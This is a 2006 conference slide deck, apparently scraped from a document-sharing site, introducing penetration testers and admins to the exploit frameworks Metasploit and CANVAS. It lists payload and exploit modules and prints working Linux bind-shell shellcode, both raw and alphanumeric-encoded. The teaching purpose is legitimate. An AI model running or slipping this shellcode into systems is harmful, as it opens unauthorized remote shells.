DEMO! Questions? - Jingojango.net

tunisianbromidrosisInternet και Εφαρμογές Web

5 Φεβ 2013 (πριν από 4 χρόνια και 5 μήνες)

124 εμφανίσεις

Exploit Frameworks

Metasploit and Canvas

Kurt Grutzmacher


Garrett Gee

grutz@jingojango.net


ggee@srtek.net

© 2006


Artistic License

BayLISA


02/18/06

Nmap
-

BayLISA
02/18/06

2

Who we are


Penetration testers for a large financial
institution in the Bay area


Many years combined experience in
performing assessments, red teaming,
exploring vulnerabilities, etc.


Nmap
-

BayLISA
02/18/06

3

Why use attack tools?

Difficult to answer in one slide, but lets try



Best way to ensure patch application


The bad guys don’t care about your policy


Helps gain a deeper knowledge


Validate protective systems or disprove
vendor claims! (Lots of fun!)

Nmap
-

BayLISA
02/18/06

4

Goals of Frameworks


“The goal is to provide useful information to
people who perform penetration testing, IDS
signature development, and exploit research.
This site was created to fill the gaps in the
information publicly available on various
exploitation techniques and to create a useful
resource for exploit developers. The tools and
information on this site are provided for legal
penetration testing and research purposes only.”


Metasploit Framework

Nmap
-

BayLISA
02/18/06

5

Attack Methodology


Reconnaissance


Port map, hunt for Visio documents, hang out
at the water cooler, pull user listing from yp,
active directory, ldap, etc.


Attack


Exploit systems for profit!


Control


Maintain access without detection

Nmap
-

BayLISA
02/18/06

6

Brief Agenda


Anatomy of an Exploit (pre ’04)


Exploit writing hurdles


Frameworks to the rescue


Future of Frameworks

Nmap
-

BayLISA
02/18/06

7

Anatomy of an Exploit


How it was before 2004:


Researcher finds a bug (overflow!)


Gains control of EIP


Writes their own shellcode or use somebody
elses (prev exploit, library, etc)


Develop and release the code to bugtraq


Sit back and rake in the cash/props!!

Nmap
-

BayLISA
02/18/06

8

Complications in Exploit Writing


Complications?


Multiple operating system support


Multiple Shellcodes


Big or Little Endian?


Delivery system may require large
development


RPC Handlers


HTTP Request/Response code


SMB? SSH? SSL? LDAP? Yuck.

Nmap
-

BayLISA
02/18/06

9

Adds Up To Fun for Researchers!


Recreating all the delivery code for each
exploit? Yeah, that’s fun.


Writing lots and lots of loops to try offsets


Hard to work with other researchers


No common base of code


Everybody does things their own way!


Might need unique payload handler for
each vuln you find! Yuck!

Nmap
-

BayLISA
02/18/06

10

Fun for PTers/Admins


Rush of writing exploits means low quality


May not always exploit correctly (false
sense of security)


Could be malicious payload!


We don’t have the time to debug some
kid’s 150 line C code.

Nmap
-

BayLISA
02/18/06

11

Problems with Complex Protos


Dependent upon the API


Usually exploits released as “patch” to
specific version of client:


Nmap
-

BayLISA
02/18/06

12

Payload Issues


Most of them are hard coded and not
something you want to test with


Very difficult to use some payloads (offset
placement, value changes, etc)


Again, no standards!

Nmap
-

BayLISA
02/18/06

13

Early Solutions


Payload Generators


Impurity


Shellforge


MOSDEF


InlineEgg


ADMutate



Nmap
-

BayLISA
02/18/06

14

Better Solutions


Exploit Frameworks


CORE Impact

http://www.coresecurity.com/products/coreimpact/index.php


ImmunitySec CANVAS

http://www.immunitysec.com/products
-
canvas.shtml


Metasploit Exploit Framework

http://www.metasploit.com/projects/Framework/

Nmap
-

BayLISA
02/18/06

15

CORE Impact

We don’t have it but here’s a screenshot!

Nmap
-

BayLISA
02/18/06

16

ImmunitySec CANVAS


This we do have. Costs $995 plus yearly
maintenance fee


Written in Python


MOSDEF and Hydrogen included


GUI GUI GUI GUI GUI GUI


Easy to use (if you know Python) API for
developing your own exploits.

Nmap
-

BayLISA
02/18/06

17

CANVAS Demo

Nmap
-

BayLISA
02/18/06

18




------------

< metasploit >


------------



\

,__,


\

(oo)____


(__) )
\


||
--
|| *

Nmap
-

BayLISA
02/18/06

19

Metasploit Exploit Framework


FREE FREE FREE FREE FREE


Version 2 written in Perl


Version 3 written in Ruby


Core developers respected within the Infosec community


Exploits are reliable and thoroughly tested


Easy to develop and expand for own research


Multiple payloads


BSD, BSDi, Solaris (SPARC & x86), IRIX, OSX, Linux, Win32


Multiple payload encoders


Great for research and development


Much much much more

Nmap
-

BayLISA
02/18/06

20

Tools in the Framework


msfpescan
-

Process a PE file for asm combinations
(jmp, pop+pop+ret, etc)


msfelfscan
-

Similar but for ELFs


msfpayload
-

Generate payload code


msfencode
-

Encode payload from stdin or input file


msfcli
-------
\


msfconsole


Core exploit execution programs


msfweb
-----
/

Nmap
-

BayLISA
02/18/06

21

msfencode Types

$ ./msfencode
-
l


Encoder Name Arch Description

Alpha2 x86 Skylined's Alpha2 alphanumeric encoder ported to perl

Countdown x86 Tiny countdown byte xor encoder

JmpCallAdditive x86 Jmp/Call XOR Additive Feedback Decoder

None


all Does nothing to the code

OSXPPCLongXOR ppc This is ghandi's PPC dword xor decoder with size eaks by HDM

OSXPPCLongXORTag ppc This is based on ghandi's PPC dword xor decoder, now tag
-
based and
smaller

Pex x86 Dynamically generated dword xor encoder

PexAlphaNum x86 Skylined's alphanumeric encoder ported to perl

PexFnstenvMov x86 Variable
-
length fnstenv/mov dword xor encoder

PexFnstenvSub x86 Variable
-
length fnstenv/sub dword xor encoder

QuackQuack ppc This is optyx's nifty ppc decoder with coherency tweaks by hdm

ShikataGaNai x86 You know what I'm saying, baby

Sparc sparc optyx's 48 byte XOR decoder


Nmap
-

BayLISA
02/18/06

22

msfpayload Payloads

$ ls payloads/

Empty.pm irix_mips_execve.pm solaris_sparc_bind.pm

bsd_ia32_bind.pm linux_ia32_adduser.pm solaris_sparc_findsock.pm

bsd_ia32_bind_ie.pm linux_ia32_bind.pm solaris_sparc_reverse.pm

bsd_ia32_bind_stg.pm linux_ia32_bind_ie.pm win32_adduser.pm

bsd_ia32_exec.pm linux_ia32_bind_stg.pm win32_bind.pm

bsd_ia32_findrecv.pm linux_ia32_exec.pm win32_bind_dllinject.pm

bsd_ia32_findrecv_stg.pm linux_ia32_findrecv.pm win32_bind_meterpreter.pm

bsd_ia32_findsock.pm linux_ia32_findrecv_stg.pm win32_bind_stg.pm

bsd_ia32_reverse.pm linux_ia32_findsock.pm win32_bind_stg_upexec.pm

bsd_ia32_reverse_ie.pm linux_ia32_reverse.pm win32_bind_vncinject.pm

bsd_ia32_reverse_stg.pm linux_ia32_reverse_ie.pm win32_downloadexec.pm

bsd_sparc_bind.pm linux_ia32_reverse_impurity.pm win32_exec.pm

bsd_sparc_reverse.pm linux_ia32_reverse_stg.pm win32_findrecv_ord_meterpreter.pm

bsdi_ia32_bind.pm linux_ia32_reverse_udp.pm win32_findrecv_ord_stg.pm

bsdi_ia32_bind_stg.pm linux_ia32_reverse_xor.pm win32_findrecv_ord_vncinject.pm

bsdi_ia32_findsock.pm linux_sparc_bind.pm win32_passivex.pm

bsdi_ia32_reverse.pm linux_sparc_findsock.pm win32_passivex_meterpreter.pm

bsdi_ia32_reverse_stg.pm linux_sparc_reverse.pm win32_passivex_stg.pm

cmd_generic.pm osx_ppc_bind.pm win32_passivex_vncinject.pm

cmd_interact.pm osx_ppc_bind_stg.pm win32_reverse.pm

cmd_irix_bind.pm osx_ppc_findrecv_peek_stg.pm win32_reverse_dllinject.pm

cmd_localshell.pm osx_ppc_findrecv_stg.pm win32_reverse_meterpreter.pm

cmd_sol_bind.pm osx_ppc_reverse.pm win32_reverse_ord.pm

cmd_unix_reverse.pm osx_ppc_reverse_nf_stg.pm win32_reverse_ord_vncinject.pm

cmd_unix_reverse_bash.pm osx_ppc_reverse_stg.pm win32_reverse_stg.pm

cmd_unix_reverse_nss.pm solaris_ia32_bind.pm win32_reverse_stg_ie.pm

external solaris_ia32_findsock.pm win32_reverse_stg_upexec.pm

generic_sparc_execve.pm solaris_ia32_reverse.pm win32_reverse_vncinject.pm

Nmap
-

BayLISA
02/18/06

23

Exploits?

3com_3cdaemon_ftp_overflow.pm

ie_xp_pfv_metafile.pm

realserver_describe_linux.pm

afp_loginext.pm

iis40_htr.pm

rsa_iiswebagent_redirect.pm

aim_goaway.pm

iis50_printer_overflow.pm

samba_nttrans.pm

altn_webadmin.pm

iis50_webdav_ntdll.pm

samba_trans2open.pm

apache_chunked_win32.pm

iis_fp30reg_chunked.pm

samba_trans2open_osx.pm

arkeia_agent_access.pm

iis_nsiislog_post.pm

samba_trans2open_solsparc.pm

arkeia_type77_macos.pm

iis_source_dumper.pm

sambar6_search_results.pm

arkeia_type77_win32.pm

iis_w3who_overflow.pm

seattlelab_mail_55.pm

awstats_configdir_exec.pm

imail_imap_delete.pm

sentinel_lm7_overflow.pm

backupexec_agent.pm

imail_ldap.pm

servu_mdtm_overflow.pm

backupexec_dump.pm

irix_lpsched_exec.pm

shoutcast_format_win32.pm

backupexec_ns.pm

lsass_ms04_011.pm

slimftpd_list_concat.pm

backupexec_registry.pm

lyris_attachment_mssql.pm

smb_sniffer.pm

badblue_ext_overflow.pm

mailenable_auth_header.pm

solaris_dtspcd_noir.pm

bakbone_netvault_heap.pm

mailenable_imap.pm

solaris_kcms_readfile.pm

barracuda_img_exec.pm

mailenable_imap_w3c.pm

solaris_lpd_exec.pm

blackice_pam_icq.pm

maxdb_webdbm_get_overflow.pm

solaris_lpd_unlink.pm

bluecoat_winproxy.pm

mdaemon_imap_cram_md5.pm

solaris_sadmind_exec.pm

cabrightstor_disco.pm

mercantec_softcart.pm

solaris_snmpxdmid.pm

cabrightstor_disco_servicepc.pm

mercury_imap.pm

solaris_ttyprompt.pm

cabrightstor_sqlagent.pm

minishare_get_overflow.pm

squid_ntlm_authenticate.pm

cabrightstor_uniagent.pm

mozilla_compareto.pm

svnserve_date.pm

cacam_logsecurity_win32.pm

ms05_039_pnp.pm

trackercam_phparg_overflow.pm

cacti_graphimage_exec.pm

msasn1_ms04_007_killbill.pm

uow_imap4_copy.pm

calicclnt_getconfig.pm

msmq_deleteobject_ms05_017.pm

uow_imap4_lsub.pm

calicserv_getconfig.pm

msrpc_dcom_ms03_026.pm

ut2004_secure_linux.pm

distcc_exec.pm

mssql2000_preauthentication.pm

ut2004_secure_win32.pm

edirectory_imonitor.pm

mssql2000_resolution.pm

warftpd_165_pass.pm

exchange2000_xexch50.pm

netterm_netftpd_user_overflow.pm

warftpd_165_user.pm

freeftpd_user.pm

openview_connectednodes_exec.pm

webstar_ftp_user.pm

futuresoft_tftpd.pm

openview_omniback.pm

winamp_playlist_unc.pm

globalscapeftp_user_input.pm

oracle9i_xdb_ftp.pm

windows_ssl_pct.pm

gnu_mailutils_imap4d.pm

oracle9i_xdb_ftp_pass.pm

wins_ms04_045.pm

google_proxystylesheet_exec.pm

oracle9i_xdb_http.pm

wmailserver_smtp.pm

hpux_ftpd_preauth_list.pm

php_vbulletin_template.pm

wsftp_server_503_mkd.pm

hpux_lpd_exec.pm

php_wordpress_lastpost.pm

wzdftpd_site.pm

ia_webmail.pm

php_xmlrpc_eval.pm

ypops_smtp.pm

icecast_header.pm

phpbb_highlight.pm

zenworks_desktop_agent.pm

ie_objecttype.pm

poptop_negative_read.pm


Nmap
-

BayLISA
02/18/06

24

Objective: Obtain Linux shellcode to bind!

$ ./msfpayload linux_ia32_bind



Name: Linux IA32 Bind Shell


Version: $Revision: 1.2 $


OS/CPU: linux/x86

Needs Admin: No


Multistage: No


Total Size: 84


Keys: bind


Provided By:


skape <miller [at] hick.org>


vlad902 <vlad902 [at] gmail.com>


Available Options:


Options: Name Default Description


--------

------

-------

-----------------------------



required LPORT 4444 Listening port for bind shell



Advanced Options:


Advanced (Msf::Payload::linux_ia32_bind):


-----------------------------------------


Description:


Listen for connection and spawn a shell


Nmap
-

BayLISA
02/18/06

25

Print that shellcode!

$ ./msfpayload linux_ia32_bind P

"
\
x31
\
xdb
\
x53
\
x43
\
x53
\
x6a
\
x02
\
x6a
\
x66
\
x58
\
x99
\
x89
\
xe1
\
xcd
\
x80
\
x96".

"
\
x43
\
x52
\
x66
\
x68
\
x11
\
x5c
\
x66
\
x53
\
x89
\
xe1
\
x6a
\
x66
\
x58
\
x50
\
x51
\
x56".

"
\
x89
\
xe1
\
xcd
\
x80
\
xb0
\
x66
\
xd1
\
xe3
\
xcd
\
x80
\
x52
\
x52
\
x56
\
x43
\
x89
\
xe1".

"
\
xb0
\
x66
\
xcd
\
x80
\
x93
\
x6a
\
x02
\
x59
\
xb0
\
x3f
\
xcd
\
x80
\
x49
\
x79
\
xf9
\
xb0".

"
\
x0b
\
x52
\
x68
\
x2f
\
x2f
\
x73
\
x68
\
x68
\
x2f
\
x62
\
x69
\
x6e
\
x89
\
xe3
\
x52
\
x53".

"
\
x89
\
xe1
\
xcd
\
x80";

(P means in PERL format, not Print…)


Nmap
-

BayLISA
02/18/06

26

Lets snazz it up some

$ ./msfpayload linux_ia32_bind R | ./msfencode
-
e PexAlphaNum
-
t perl

[*] Using Msf::Encoder::PexAlphaNum with final size of 243 bytes

"
\
xeb
\
x03
\
x59
\
xeb
\
x05
\
xe8
\
xf8
\
xff
\
xff
\
xff
\
x4f
\
x49
\
x49
\
x49
\
x49
\
x49".

"
\
x49
\
x51
\
x5a
\
x56
\
x54
\
x58
\
x36
\
x33
\
x30
\
x56
\
x58
\
x34
\
x41
\
x30
\
x42
\
x36".

"
\
x48
\
x48
\
x30
\
x42
\
x33
\
x30
\
x42
\
x43
\
x56
\
x58
\
x32
\
x42
\
x44
\
x42
\
x48
\
x34".

"
\
x41
\
x32
\
x41
\
x44
\
x30
\
x41
\
x44
\
x54
\
x42
\
x44
\
x51
\
x42
\
x30
\
x41
\
x44
\
x41".

"
\
x56
\
x58
\
x34
\
x5a
\
x38
\
x42
\
x44
\
x4a
\
x4f
\
x4d
\
x41
\
x43
\
x4b
\
x4d
\
x43
\
x45".

"
\
x43
\
x54
\
x43
\
x55
\
x4c
\
x36
\
x44
\
x30
\
x4c
\
x36
\
x48
\
x46
\
x4a
\
x55
\
x49
\
x39".

"
\
x49
\
x58
\
x41
\
x4e
\
x4d
\
x4c
\
x42
\
x48
\
x48
\
x39
\
x43
\
x34
\
x44
\
x35
\
x48
\
x36".

"
\
x4a
\
x36
\
x41
\
x31
\
x4e
\
x45
\
x48
\
x46
\
x43
\
x45
\
x49
\
x58
\
x41
\
x4e
\
x4c
\
x56".

"
\
x48
\
x46
\
x4a
\
x35
\
x42
\
x45
\
x41
\
x35
\
x48
\
x55
\
x49
\
x58
\
x41
\
x4e
\
x4d
\
x4c".

"
\
x42
\
x48
\
x42
\
x4b
\
x48
\
x56
\
x41
\
x4d
\
x43
\
x4e
\
x4d
\
x4c
\
x42
\
x38
\
x44
\
x45".

"
\
x44
\
x35
\
x48
\
x35
\
x43
\
x44
\
x49
\
x38
\
x41
\
x4e
\
x42
\
x4b
\
x48
\
x46
\
x4d
\
x4c".

"
\
x42
\
x38
\
x43
\
x59
\
x4c
\
x36
\
x44
\
x50
\
x49
\
x45
\
x42
\
x4b
\
x4f
\
x33
\
x4d
\
x4c".

"
\
x42
\
x58
\
x49
\
x34
\
x49
\
x47
\
x49
\
x4f
\
x42
\
x4b
\
x4b
\
x50
\
x44
\
x45
\
x4a
\
x36".

"
\
x4f
\
x32
\
x4f
\
x32
\
x43
\
x57
\
x4a
\
x36
\
x4a
\
x36
\
x4f
\
x32
\
x44
\
x46
\
x49
\
x36".

"
\
x50
\
x56
\
x49
\
x48
\
x43
\
x4e
\
x44
\
x35
\
x43
\
x35
\
x49
\
x58
\
x41
\
x4e
\
x4d
\
x4c".

"
\
x42
\
x38
\
x5a";


Nmap
-

BayLISA
02/18/06

27

Learn By Example: LSASS


A routine scan found a system vulnerable to
MS04
-
011 (don’t laugh, it happens)


You track down the system and the owner
claims it’s not exploitable because they’ve done
“something” to it.


Sure scanners lie sometimes, but 99% of the
time this one is right. (percentages are estimates
and not proven facts)


Management approves your ability to secure the
network at “all costs”

Nmap
-

BayLISA
02/18/06

28

Achtung!


Exploiting systems you do not have the authority
to can be career limiting events!


Always get approval from somebody higher in
the food chain than you.


The Internet is not your own private lab.


VMware Server is now free!
http://www.vmware.com/products/server/

Nmap
-

BayLISA
02/18/06

29

Lassoing the LSASS

With all your permissions in hand, attack!

Nmap
-

BayLISA
02/18/06

30

Metasploit in Real Life



DEMO!

Questions?

Nmap
-

BayLISA
02/18/06

32

Thanks!


Thanks to the authors of Metasploit, the
researchers, the kids writing exploits, the
kids finding exploits, and Microsoft for
keeping us in business.



http://grutz.jingojango.net/presentations
/